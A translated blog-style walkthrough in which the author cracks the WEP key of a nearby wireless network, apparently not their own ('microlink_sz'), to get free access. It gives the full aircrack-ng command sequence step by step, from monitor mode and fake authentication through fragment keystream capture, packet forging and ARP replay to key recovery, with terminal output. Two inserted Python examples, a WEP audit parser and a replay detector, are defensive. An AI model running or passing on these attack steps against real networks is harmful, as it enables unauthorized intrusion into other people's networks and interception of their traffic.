Out of curiosity: if you want to connect to a wireless network wherever you happen to be, you need its key. So I spent a few days trying out the attack that is described on the Internet. The process was as follows:
1. My NIC is an rt73 USB wireless LAN card; that is the full name shown in Device Manager. Under XP I had downloaded the complete vendor driver, whereas under Ubuntu I installed no driver at all.
2. First you need the name and channel number of the target Wi-Fi network in your surroundings. I boot the bt3 toolkit from a USB stick; once on the desktop, open its Wi-Fi assistant tool, which shows the current network names and channel numbers, and write them down. For example, I noted the network name microlink_sz on channel 11.
3. Boot into Ubuntu and plug in the wireless NIC, making sure it is loaded and recognised correctly. If the NIC is working, a prompt box appears saying that the Ralink rt73 wireless NIC has been loaded.
4. Open a new terminal and run: ifconfig
Terminal display:
wlan0  Link encap: Ethernet  HWaddr 00:0C:43:2A:36:C4
       BROADCAST MULTICAST  MTU: 1500  Metric: 1
       RX packets: 0 errors: 0 dropped: 0 overruns: 0 frame: 0
       TX packets: 0 errors: 0 dropped: 0 overruns: 0 carrier: 0
       collisions: 0 txqueuelen: 1000
       RX bytes: 0 (0.0 B)  TX bytes: 0 (0.0 B)
Parameter description: no parameters; it displays the PC's complete network configuration.
Function: this command gives you the interface name and MAC address of your wireless network card.
5. In the terminal run: airmon-ng start wlan0 11
Terminal display:
Interface  Chipset          Driver
wlan0      Ralink 2573 USB  rt73usb - [phy1]
           (monitor mode enabled on mon0)
Parameter description: wlan0 is the name of the wireless card to put into monitor mode, and 11 is the channel the target network is on.
Function: the first time you run this you may be told that a tool of the aircrack-ng suite is missing; install it with apt-get install. The command puts your wireless card into monitor mode, so that it can capture packets. Once it has run you will see the alias of the card in monitor mode, mon0. If the channel turns out to be wrong, run the command again.
6. In the terminal run: airodump-ng --ivs -w name -c 11 mon0
Terminal display:
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:1D:73:DE:9C:F5  -55  71    16605    14114   12  11  54 . WEP         OPN  microlink_sz
 00:1D:0F:84:06:8C  -53   0       31        0    0   6  54 . WEP              TP-LINK
 00:1D:73:DE:A8:1D  -63  99    17107    62334        11  54 . WEP         OPN  microlink_sz

 BSSID              STATION            PWR  Rate   Lost  Packets  Probes
 (not associated)   00:11:F6:88:14:D6  -69   0- 1     0       61
 (not associated)   00:1F:3A:97:B1:CE  -71   0- 1     0       92
 00:1D:73:DE:9C:F5  00:1F:3B:16:00:CB  -69   1-12     8     5215  microlink_sz
 00:1D:73:DE:9C:F5  00:1F:3B:A0:C2:1B  -69  54- 6    18     4707  wxyz,microlink_sz
Parameter description: BSSID is the AP's MAC address. PWR is the AP's signal strength; if it is below 10, packet loss is severe and cracking is difficult. RXQ indicates interference. Beacons counts the frames sent and received (data is included in this figure). #Data counts the special packets received that can be used for cracking; if it does not change, no client is connected, which makes cracking harder. CH is the channel number. MB is the link speed, 54 meaning 54 Mb. ENC, CIPHER and AUTH give the encryption method; WEP means it can be cracked. ESSID is the AP name; a Chinese name can only get in the way of the attack.
Function: lists the Wi-Fi networks in range and their details. Leave this window open and running; you do not need to touch it again.
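As an added example, not part of the original page, here is how a network owner would read the same airodump-ng table defensively: parse the AP rows and flag every network still on WEP or open authentication, the two conditions the following steps depend on. The sample dump is constructed with locally administered MACs and invented ESSIDs, and the #/s threshold is an assumption.

```python
import re
# Constructed sample (not from the page): the AP section of an airodump-ng text
# dump in the column layout of the capture above; MACs/ESSIDs are made up.
SAMPLE_DUMP = """\
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 02:00:00:00:00:01  -55  71    16605    14114   12  11  54 . WEP  WEP    OPN  legacy-office
 02:00:00:00:00:02  -53   0       31        0    0   6  54 . WEP              store-cam
 02:00:00:00:00:03  -40  90     9812      512    3   1  54e  WPA2 CCMP   PSK  corp-wlan
 02:00:00:00:00:04  -60  12      440       20    0  11  54 . OPN              guest-open
"""
MAC = re.compile(r"^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")
CIPHERS = {"WEP", "WEP40", "WEP104", "TKIP", "CCMP"}
AUTHS = {"OPN", "SKA", "PSK", "MGT"}

def parse_ap_rows(text):
    """One dict per AP row; header, blank and station-table rows are skipped."""
    rows = []
    for line in text.splitlines():
        tok = line.split()
        # AP rows start with one MAC, station rows with two: skip the latter.
        if len(tok) < 9 or not MAC.match(tok[0]) or MAC.match(tok[1]):
            continue
        i = 8                                # 0:BSSID 1:PWR ... 6:CH 7:MB
        if tok[i] in {".", "e", "e."}:       # airodump prints MB as "54 ." / "54e"
            i += 1
        enc, i = tok[i], i + 1
        cipher = auth = ""                   # either column may be blank for WEP
        while i < len(tok) and (tok[i] in CIPHERS or tok[i] in AUTHS):
            if tok[i] in CIPHERS: cipher = tok[i]
            else: auth = tok[i]
            i += 1
        rows.append({"bssid": tok[0], "data": int(tok[4]), "pps": int(tok[5]),
                     "ch": int(tok[6]), "enc": enc, "cipher": cipher,
                     "auth": auth, "essid": " ".join(tok[i:])})
    return rows

def audit(rows, replay_pps=10):
    """ESSID -> findings for the weaknesses the steps on this page rely on."""
    findings = {}
    for r in rows:
        issues = []
        if r["enc"] == "WEP":
            issues.append("WEP: key recoverable from captured IVs")
            if r["auth"] in ("", "OPN"):
                issues.append("open-system auth: fake association accepted")
            if r["pps"] >= replay_pps:       # heuristic threshold, not from the page
                issues.append("#/s high: possible ARP replay in progress")
        elif r["enc"] == "OPN":
            issues.append("no encryption")
        if issues:
            findings[r["essid"]] = issues
    return findings
```

Feed it the text saved by airodump-ng (or redirect its output) and anything listed in the result is a network to migrate to WPA2 before someone follows the steps below against it.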
7. Open a new terminal and run: aireplay-ng -1 0 -e microlink_sz -a 001d73dea81d -h 000c432a36c4 mon0
Terminal display:
10:44:54  Waiting for beacon frame (BSSID: 00:1D:73:DE:A8:1D) on channel 11
10:44:54  Sending Authentication Request (Open System) [ACK]
10:44:54  Authentication successful
10:44:54  Sending Association Request [ACK]
10:44:54  Association successful (AID: 1)
Parameter description: microlink_sz is the AP name; 001d73dea81d is the MAC address of the target AP, taken from step 6 with the colons removed; 000c432a36c4 is your own card's MAC address from step 4, again with the colons removed; mon0 is the monitor interface from step 5.
Function: this command is mainly for APs whose #Data grows slowly. aireplay, as the name suggests, replays packets; here it sends a fake authentication to the AP. If it works, "successful" is displayed.
8. In the terminal run: aireplay-ng -5 -b 001d73dea81d -h 000c432a36c4 mon0
Terminal display:
10:54:18  Waiting for beacon frame (BSSID: 00:1D:73:DE:A8:1D) on channel 11
10:54:18  Waiting for a data packet...
Read 27 packets...

        Size: 88, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:1D:73:DE:A8:1D
          Dest. MAC  =  00:1E:BE:C7:B8:CA
         Source MAC  =  00:1F:3A:52:BD:73

        0x0000:  0841 2c00 001d 73de a81d 001f 3a52 bd73
        0x0010:  001e bec7 b8ca f021 2d42 0000 31f4 7340
        0x0020:  b50a bd80 41fc 1d01 5103 5ec1 21fa 4a5e
        0x0030:  f423 aced ff21 8623 664c 815b f58c f6e7
        0x0040:  8b8c 2b31 4319 2a9e f99c e895 af6a bb13
        0x0050:  dd55 d2d7 0eda 68da

Use this packet ? y

Saving chosen packet in replay_src-0415-105425.cap
10:55:12  Data packet found!
10:55:12  Sending fragmented packet
10:55:12  Got RELAYED packet!!
10:55:12  Trying to get 384 bytes of a keystream
10:55:12  Got RELAYED packet!!
10:55:12  Trying to get 1500 bytes of a keystream
10:55:13  Got RELAYED packet!!
Saving keystream in fragment-0415-105512.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Parameter description: 001d73dea81d is the target AP's MAC address, 000c432a36c4 is your card's MAC address, and mon0 is the monitor alias.
Function: after the previous step has succeeded, this collects a #Data packet to use for the attack. If #Data is not growing, the command keeps running until one data packet is captured. It then asks whether to use that packet; answer y. On success it reports the result and saves a file named fragment-xxxx-xxxx.xor, which is used in the next step, in the root directory (on my computer).
9. In the terminal run: packetforge-ng -0 -a 001d73dea81d -h 000c432a36c4 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0415-105512.xor -w mrarp
Terminal display:
Wrote packet to: mrarp
Parameter description: 001d73dea81d is the target MAC address; 000c432a36c4 is your MAC address; fragment-0415-105512.xor is the file name shown in step 8.
Function: builds the packet for the attack and writes it to the file mrarp.
10. In the terminal run: aireplay-ng -2 -r mrarp -x 512 mon0
Terminal display:
No source MAC (-h) specified. Using the device MAC (00:0C:43:2A:36:C4)

        Size: 68, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:1D:73:DE:A8:1D
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:0C:43:2A:36:C4

        0x0000:  0841 0201 001d 73de a81d 000c 432a 36c4
        0x0010:  ffff ffff ffff 8001 e4cb 8500 0039 fd12
        0x0020:  169e 7a6a b98d 8bd7 08d9 6bb3 fed2 5890
        0x0030:  d1bc d1ef 2bfe 0ec7 b11d 3032 246e 40c9
        0x0040:  a65a 27af

Use this packet ? y

Saving chosen packet in replay_src-0415-110249.cap
Sent XXXX packets...
Parameter description: mon0 is the monitor alias of the wireless card; 512 is the injection rate, 1024 is the maximum and 512 is what is generally used.
Function: when this step starts, answer y; you will see the count of sent packets climbing, and the #Data figure in the first terminal also rises rapidly. Just wait.
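From the network owner's side, the replay that makes #Data climb has an obvious fingerprint: one station re-sending the same encrypted frame (same IV, same size) hundreds of times a second. The following detector is an added example, not part of the original page; it runs over a constructed frame log with made-up MACs, the 512 per second rate and 68-byte size mirror the step above, and the alert threshold is an assumption.

```python
from collections import Counter, defaultdict

def constructed_frames():
    """Constructed frame log, not a real capture: (time_s, source MAC, WEP IV hex,
    frame size) for each WEP data frame seen on the channel. Three ordinary
    frames, then a modelled ARP replay flood: the same 68-byte frame with the
    same IV re-sent 600 times at 512 frames per second, the rate used above."""
    frames = [(0.10, "02:00:00:00:00:aa", "1a2b3c", 102),
              (0.35, "02:00:00:00:00:aa", "1a2b3d", 130),
              (0.80, "02:00:00:00:00:bb", "77ee01", 94)]
    frames += [(1.0 + i / 512, "02:00:00:00:00:cc", "e4cb85", 68) for i in range(600)]
    return frames

def detect_replay(frames, window_s=1.0, repeat_threshold=50):
    """Alert when one source re-sends an identical (IV, size) frame more than
    repeat_threshold times within a window_s bucket. A normal WEP station
    changes the IV on every frame, so hundreds of copies of one IV from one
    MAC are the signature of injected replay traffic rather than real use."""
    buckets = defaultdict(Counter)
    for t, src, iv, size in frames:
        buckets[int(t // window_s)][(src, iv, size)] += 1
    alerts = []
    for bucket in sorted(buckets):
        for (src, iv, size), n in buckets[bucket].items():
            if n > repeat_threshold:
                alerts.append({"window": bucket, "src": src, "iv": iv,
                               "size": size, "repeats": n})
    return alerts

if __name__ == "__main__":
    for a in detect_replay(constructed_frames()):
        print(f"t={a['window']}s {a['src']} replayed IV {a['iv']} x{a['repeats']}")
```

In a real deployment the tuples would come from a monitor-mode capture (the IV is the first three bytes after the 802.11 header of a WEP frame); the alert is also a cue that the AP in question should have been moved off WEP long ago.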
11. Run: aircrack-ng -n 64 -b 001d73dea81d name-01.ivs
Terminal display:
Opening name-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 40103 ivs.

                                 Aircrack-ng 1.0 rc3

                 [00:00:11] Tested 8 keys (got 40982 IVs)

   KB    depth   byte(vote)
    0    0/  1   36(58156) 8A(48492) B5(48016) 86(47920) 19(47676)
    1    0/  1   39(52472) 83(47580) B2(46496) D0(46448) 29(46312)
    2    0/  1   39(53488) 22(48804) FC(48144) 85(48108) 55(47784)
    3    0/  1   39(54596) A7(48580) 46(48568) 76(48392) 22(47804)
    4    0/  7   04(48432) BD(47996) 04(47680) B9(47524) 17(47376)

             KEY FOUND! [ 36:39:39:39:39 ] (ASCII: 69999 )
        Decrypted correctly: 100%
Parameter description: 001d73dea81d is the target MAC address to crack; name-01.ivs is the file generated earlier, saved in the root directory as name-xx.ivs; pick the one with the highest number.
Function: once #Data reaches 10000 or more, the cracked key is displayed along with its ASCII form. If you are unlucky, just keep waiting.
Reference: http://www.city009.cn/wep-wap-pojie-8.html